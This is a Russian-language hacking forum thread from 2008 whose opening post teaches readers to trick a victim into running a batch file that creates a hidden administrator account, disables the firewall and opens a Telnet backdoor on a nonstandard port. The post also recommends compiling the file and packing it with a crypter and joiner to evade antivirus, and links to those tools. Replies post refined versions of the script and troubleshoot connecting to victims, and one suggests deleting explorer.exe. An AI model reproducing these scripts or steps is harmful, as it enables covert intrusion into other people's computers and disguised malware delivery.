Взлом через Telnet
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом через Telnet - 2008-08-31 01:48:44.003333
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.
Телнет - сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.
Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у
жертвы. Бывает такое, что этот сервис уже будет весить у "врага", но при попытки
подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,
но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким
методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.
Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот
метод в данном случае наиболее актуален.
Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый
тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе
порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто
написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной
строки).
тело батника:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
все это пишешь в блокноте, и сохраняем как *.bat
Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add - не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=
auto которая
меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это
палевно, поэтому советую прописывать этой командой tlntadmn config port=972
sec=-NTLM , редко используемый порт. В нашем случае это 972.
Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet
окончательно запустит наш бэкдор.
теперь проверим правильный ли синтаксис кода. Открываем командную строку, если
она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,
запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:
Пуск -> Выполнить -> пишем services.msc -> Ok
Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и
смотришь её свойства. При необходимости в любой момент можно её отключить.
Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает
консольное черное окно, говорящее о выполняемых процессах в командной строке. Но
не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http://letitbit.net/download/555aab528156/QuickBatchFileCompiler-3.1.6.0.rar.html. Она
компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник
превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.
Вроде готово… Но не совсем, ты же не будешь дарить пустой экзешник, поэтому
бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно
скачать тут http://letitbit.net/download/a6874d818428/pohernah107.rar.html pohernah107(13 кб) а джойнер можешь взять здесь http://letitbit.net/download/bcb3ca782091/RedBindeR-v1.3-Mod.rar.html
RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменить
сигнатуру дабы не палится антивирусами.
Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы
тебе осталось только подключится к телнету через указанный тобой порт. Бывает
так что жертва находится в глобальной сети www у которой IP динамический, в этом
случаи, зная диапазон IP его провайдера можно просканировать эту сеть на
открытый наш редко используемый 972 Порт. А чтобы знать когда твой "друг"
в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.
Осталось подключится. Для этого можешь выбрать стандартный виндосовский
клиент который находится тут c:WINDOWSsystem32telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё акей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*================================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*================================================================
C:>_
Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды…
Можно к примеру расшарить диски:
C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul
перезагрузить комп:
C:>shutdown -r -t 1 -c -f
прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему
или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)
Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.
P.S. На все непонятные термины и выражения есть Гугл.
Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь
попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей
информационной безопасности.
P.P.S Возможно не туда выложил… Покажите место плиз, или сами перенесите
Источник: www.hackzona.ru - GivioN
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 01:50:45.613333
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
Сам писал?
Нет - ставь копирайты)
Неплохо для первого сообщения
и название темы подправь)
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 01:56:14.930000
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
quote:
ORIGINAL: Mr_Naeba
Сам писал?
Нет - ставь копирайты)
Неплохо для первого сообщения
Ок…Спасибо))
quote:
и название темы подправь)
:D )))))
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 02:03:34.260000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
]:::::[
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 02:10:44.356666
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
SUPPORT_388945a0 - зачем её удалять?
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 02:32:54.210000
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
quote:
ORIGINAL: хPurg3n
SUPPORT_388945a0 - зачем её удалять?
Конечно можно и не удалять учетку, и с ней и через её работать можно, но для полноты и большей функциональности языка бат, решил вставить эту строчку
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 08:26:34.406666
|
|
|
gromoza2
Сообщений: 170
Оценки: 0
Присоединился: 2008-08-27 22:27:24.110000
|
Знаете я тока одного не понял как потом на расшаренные диски заходить?
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 11:05:32.653333
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
quote:
ORIGINAL: GivioN
quote:
ORIGINAL: хPurg3n
SUPPORT_388945a0 - зачем её удалять?
Конечно можно и не удалять учетку, и с ней и через её работать можно, но для полноты и большей функциональности языка бат, решил вставить эту строчку
Не совсем понимаю каким образом это влияет на полноту и функциональность дос команд, но помоему эта учетка абсолютно не влияет ни на что, если убрать строчки связанные с ней функционал не изменится.
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 11:56:31.673333
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: GivioN
quote:
ORIGINAL: хPurg3n
SUPPORT_388945a0 - зачем её удалять?
Конечно можно и не удалять учетку, и с ней и через её работать можно, но для полноты и большей функциональности языка бат, решил вставить эту строчку
мм…каг эт ты решил, если аффтор не ты? О_о
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 14:17:17.760000
|
|
|
D10n1s
Сообщений: 100
Оценки: 0
Присоединился: 2007-02-16 09:10:52.283333
|
quote:
мм…каг эт ты решил, если аффтор не ты? О_о
как не он? вроде бы ник автора и ник в источнике - идентичны.
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 15:12:25.030000
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
quote:
ORIGINAL: gromoza2
Знаете я тока одного не понял как потом на расшаренные диски заходить?
Можно стандартным способом, но лучше пользуйся прогой Essentional Net Tools 4.1.build.204
http://www.rapidshare.ru/768421
quote:
ORIGINAL: хPurg3n
Не совсем понимаю каким образом это влияет на полноту и функциональность дос команд, но помоему эта учетка абсолютно не влияет ни на что, если убрать строчки связанные с ней функционал не изменится.
Конэшно не изменится)
quote:
ORIGINAL:
мм...каг эт ты решил, если аффтор не ты? О_о
А кто?
quote:
ORIGINAL: D10n1sкак не он? вроде бы ник автора и ник в источнике - идентичны.
;)
|
|
|
|
|
RE: Взлом через Nelnet - 2008-08-31 15:32:13.740000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
quote:
ORIGINAL: GivioN
Конэшно не изменится)
А зачем удалять? :) Может тогда ещё докучи
taskkill /f /im explorer.exe
del %windir%\explorer.exe Добавить? :) Ну чтоб просто ещё ченить удалить.
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-04 19:37:27.646666
|
|
|
Antinup
Сообщений: 18
Оценки: 0
Присоединился: 2008-09-01 00:24:19.433333
|
quote:
ORIGINAL: хPurg3n
А зачем удалять? :) Может тогда ещё докучи
taskkill /f /im explorer.exe
del %windir%\explorer.exe Добавить? :) Ну чтоб просто ещё ченить удалить.
слышь а это идея:)
ЗЫ: Пурген рулит
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-04 19:57:02.936666
|
|
|
Sh1td0wn
Сообщений: 156
Оценки: 0
Присоединился: 2008-05-16 16:48:32.490000
|
токо достать трудно)))
Я, кстати, так и сделал, только меня кидает. Сразу. Говорят типа я не админ. В чём дело?
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-05 02:31:52.566666
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
quote:
ORIGINAL: Sh1td0wn
токо достать трудно)))
Я, кстати, так и сделал, только меня кидает. Сразу. Говорят типа я не админ. В чём дело?
Поясни, что ты делал и что достать трудно
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-05 07:00:03.310000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
net localgroup Администраторы hacker /add
а если нет такой группы, а стоит другая? можете подскзать условные операторы для данной ситуации ( проверка группы, если нет то проверка на другую…) чтобы хотябы несколько групп проверялось?
=)
quote:
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
как на удалённом компе это сделать? через командную строку телнета? как )
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-05 14:56:27.993333
|
|
|
Sh1td0wn
Сообщений: 156
Оценки: 0
Присоединился: 2008-05-16 16:48:32.490000
|
quote:
Поясни, что ты делал и что достать трудно
трудно достать пурген))))
я запустил авто запуск телнет сервиса и коннектюсь с удалённой)) (в соседней комнате) машине. Пишут: ты не админ, пошёл в (покосился на админа) баню. Точно воспроизвести сейчас не могу
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-07 17:47:20.160000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
пробовал в локалке, не пашет… меня с правами админа создаёт на атакуемом компе, а не соединяется, пробовал менять порты- не помогает,вобщем не всё так просто как пишут
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-07 20:57:41.260000
|
|
|
Mirk
Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
|
я сегодня весь день пытался "взломать" компьютер (в том числе и свой) выключал все антивирусы и интихаки на атакуемом компе, нечего не получается. не удаётся подключиться к порту… в чём может быть проблемма? (делал всё так как написано)
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-08 00:14:19.853333
|
|
|
PigMeyB
Сообщений: 269
Оценки: 0
Присоединился: 2008-07-15 15:39:57.543333
|
Это все хорошо если есть возможность впарить левый файл, да еще и выполнить с правами админа. А что если не удастся файл втюхать или вообще это роутэр на котором телнет висит? Есть альтернативные бруту решения? (А то ждать 5 лет, а еще если включен лимит неудачных входов…)
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-08 14:36:58.756666
|
|
|
Mirk
Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
|
ну так что ? почему может не получаться?
|
|
|
|
|
RE: Взлом через Nelnet - 2008-09-08 19:12:34.270000
|
|
|
Denisska05
Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
|
одно огромное НО! у человека должен быть выход в интернет со своим Ip, не через маршрутизатор прова.. из личного опыта скажу, таких мало. На ачате была статейка что-то типа батник-троян, советую прочесть, больше пользы будет… правда помоему ее там удалили через пару дней после постинга.. странные у них там правила.. "У нас запрещены статьи про трояны"
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-08 22:30:16.956666
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
ооооооооооооо… как много вопросов!!!
постораюсь ответить всем)))
quote:
ORIGINAL: brtn
а если нет такой группы, а стоит другая? можете подскзать условные операторы для данной ситуации ( проверка группы, если нет то проверка на другую…) чтобы хотябы несколько групп проверялось?
=)
Значит на английском винда, попробуй как
net localgroup Administrators hacker /add
quote:
quote:
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
как на удалённом компе это сделать? через командную строку телнета? как )
Да, через комондную строку))
но я недавно нашел что можно так:
chcp 1251
net user SUPPORT_388945a0 /delete
net user support tebehana /add
net localgroup Администраторы support /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0
y
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
quote:
ORIGINAL: Sh1td0wn">quote:
ORIGINAL: Sh1td0wn
я запустил авто запуск телнет сервиса и коннектюсь с удалённой)) (в соседней комнате) машине. Пишут: ты не админ, пошёл в (покосился на админа) баню. Точно воспроизвести сейчас не могу
quote:
ORIGINAL: brtn
пробовал в локалке, не пашет… меня с правами админа создаёт на атакуемом компе, а не соединяется, пробовал менять порты- не помогает,вобщем не всё так просто как пишут
quote:
ORIGINAL: Mirk
я сегодня весь день пытался "взломать" компьютер (в том числе и свой) выключал все антивирусы и интихаки на атакуемом компе, нечего не получается. не удаётся подключиться к порту… в чём может быть проблемма? (делал всё так как написано)
А что именно пишет???
Возможно конфликт с рускоязычной кодировкой
Попробуйте логин и пас прописать цифрами, например:
net user 12345 1234 /add
или возможно фаерфол мешает…Если это виндовский брандмауэр, можно дописать это в тело батника:
net stop sharedaccess
sc config sharedaccess start= disabled
quote:
ORIGINAL: PigMeyB
Это все хорошо если есть возможность впарить левый файл, да еще и выполнить с правами админа. А что если не удастся файл втюхать или вообще это роутэр на котором телнет висит? Есть альтернативные бруту решения? (А то ждать 5 лет, а еще если включен лимит неудачных входов…)
Возможно есть сплойты на сервис телнет… В привате точно есть
quote:
ORIGINAL: Denisska05
одно огромное НО! у человека должен быть выход в интернет со своим Ip, не через маршрутизатор прова.. из личного опыта скажу, таких мало. На ачате была статейка что-то типа батник-троян, советую прочесть, больше пользы будет… правда помоему ее там удалили через пару дней после постинга.. странные у них там правила.. "У нас запрещены статьи про трояны"
Как я понял ты хочешь сказать, что у жертвы динамический ИП адрес???
В этом случаи сканируй сеть его провайдера на открытый порт, в данном случаи 972
Или при подключении пакеты не проходят маршрутизатор провайдера и не доходят до жертвы???
Поясни
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-08 23:55:47.100000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
из всего выше написанного и ранее слышанного составил следующий батник:
REM QBFC Project Options Begin
:: HasVersionInfo: No
REM Companyname:
REM Productname:
REM Filede..ion:
REM Copyrights:
REM Trademarks:
REM Originalname:
REM Comments:
REM Productversion: 0. 0. 0. 0
REM Fileversion: 0. 0. 0. 0
REM Internalname:
REM Appicon:
REM QBFC Project Options End
chcp 1251
net user SUPPORT_388945a0 /delete
net user brtn 123 /add
net localgroup Администраторы brtn /add
net localgroup Administrators brtn /add
net localgroup Пользователи SUPPORT_388945a0 /del
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "brtn" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=970 sec=-NTLM
net start Telnet
прошу гуру прокоментировать и указать на ошибки / не функциональные части, а также части явно не желательные (а то толстовато получилось + криптовать)
=)
_____
новые успехи и новые проблемы:
пытаюсь конектить локальный комп с ип 10.13.55.18, конекта не идёт, тут решил просканировать трафик и нашёл в логе там нашу айсикьюшную переписку с тем компом , самое странное что ип у него с каго-то чЕрта 64.12.28.85, удивился что(?) это ему ип меняет, пробую конектить к 64.12.28.85 через следующий бат:
chcp 1251
net user admin admin /add
net localgroup Администраторы admin /add
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin" /t REG_DWORD /d 0 /f
в итоге конектит! потом выползает вот такая тема (см. скрин)
и скидывает соединение после нажатия любой клавиши
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-09 16:12:27.730000
|
|
|
Denisska05
Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
|
GivioN я имел ввиду наличие обычного NAT сервера, который все обомает..
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-09 16:52:38.090000
|
|
|
Mirk
Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
|
Вот что пишет:
не удалось открыть подключение к этому узлу, на порт 972: сбой подключения
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-10 08:13:23.210000
|
|
|
D10n1s
Сообщений: 100
Оценки: 0
Присоединился: 2007-02-16 09:10:52.283333
|
quote:
Вот что пишет:
не удалось открыть подключение к этому узлу, на порт 972: сбой подключения
а на другой порт? фаервол на атакуемой машине в наличии?
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-10 15:33:45.403333
|
|
|
Mirk
Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
|
пробовал на стандартный порт 23, тож не идёт, насчёт фаярвола незнаю, но когда испытывал а своей машине фаярвол и антивирус были отключены
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-10 18:50:14.666666
|
|
|
Mirk
Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
|
я переделал исходник и сделал такое:
chcp 1251
net user 12345 02486 /add
net localgroup Администраторы 12345 /add
net localgroup Administrators 12345 /add
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "12345" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=976 sec=-NTLM
net start Telnet
посмотрите всёли правильно, я сохранил это в формате .bat и запускию на компе
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-10 21:13:19.270000
|
|
|
Mastino
Сообщений: 2
Оценки: 0
Присоединился: 2008-09-06 16:41:16.566666
|
А мне получается присоединится но пишет что не правильный логин или пасворд хотя он правильный.
П.С. У нас 2 компа на одной линии (с тем же IP), так я с одного на другой пытаюсь :) В чем может быть проблема?
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-10 21:33:45.416666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: Mastino
А мне получается присоединится но пишет что не правильный логин или пасворд хотя он правильный.
П.С. У нас 2 компа на одной линии (с тем же IP), так я с одного на другой пытаюсь :) В чем может быть проблема?
в том что ты цепляешь свой комп, возможно . попробуй запустить на своей машине и написать в телнете: o 127.0.0.1 972 потом введи логин и пароль, должно работать, елси нет , то логин с паролем можно посмотреть в теле бата
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-11 11:03:31.230000
|
|
|
D10n1s
Сообщений: 100
Оценки: 0
Присоединился: 2007-02-16 09:10:52.283333
|
quote:
А мне получается присоединится но пишет что не правильный логин или пасворд хотя он правильный.
П.С. У нас 2 компа на одной линии (с тем же IP), так я с одного на другой пытаюсь :) В чем может быть проблема?
использовать сетевой ип компа, ип одинаковых в одной сети не может быть ), это на инет у вас один ип…
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-11 15:40:16.010000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
в общем дело в том что ты забыл логин и пароль, иначе аутификация прошла бы успешно, правда на твой писи )
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-11 18:39:12.723333
|
|
|
Sh1td0wn
Сообщений: 156
Оценки: 0
Присоединился: 2008-05-16 16:48:32.490000
|
я же сказал: меня кидает СРАЗУ после подключения! Имя пользователя на локальном компе и на сервере должны совпадать?
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-11 19:30:30.800000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: Sh1td0wn
я же сказал: меня кидает СРАЗУ после подключения! Имя пользователя на локальном компе и на сервере должны совпадать?
у меня таже проблема, дело как мне видица, в файрволе, и , при том, не виндовском, а , к примеру, в том , который стоит в nod32 security (он стоял на тестируемой машинке), но это уже в сети, а если на локалхост конектишь то всё должно быть нормально, попробуй…
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-11 20:37:53.640000
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
У меня тоже была такая проблема. Пропитываешь логин и пас цифрами и все впоряде:)
я уже писал это.
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-16 17:34:03.826666
|
|
|
samsung777
Сообщений: 18
Оценки: 0
Присоединился: 2008-08-29 19:43:57.100000
|
а вот если имеется физический доступ к компу, вот я включаю:
1) сначала в системе ставлю разрешение на удаленный доступ к компу
2) захожу в службы, запускаю telnet, а что насчет вкладки вход в систему?
что там выбрать и что сделать чтобы я мог подключится?
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-16 19:36:06.326666
|
|
|
Sh1td0wn
Сообщений: 156
Оценки: 0
Присоединился: 2008-05-16 16:48:32.490000
|
запустил телнет - подключайся!
|
|
|
|
|
RE: Взлом через Telnet - 2008-09-16 20:24:12.783333
|
|
|
samsung777
Сообщений: 18
Оценки: 0
Присоединился: 2008-08-29 19:43:57.100000
|
нет, я имею ввиду там настройки логина и пароля, стоит настройка: типо вход в систему с системной учетной записью, при подключении он не будет требовать логин и пароль?
|
|
|
|
|
|
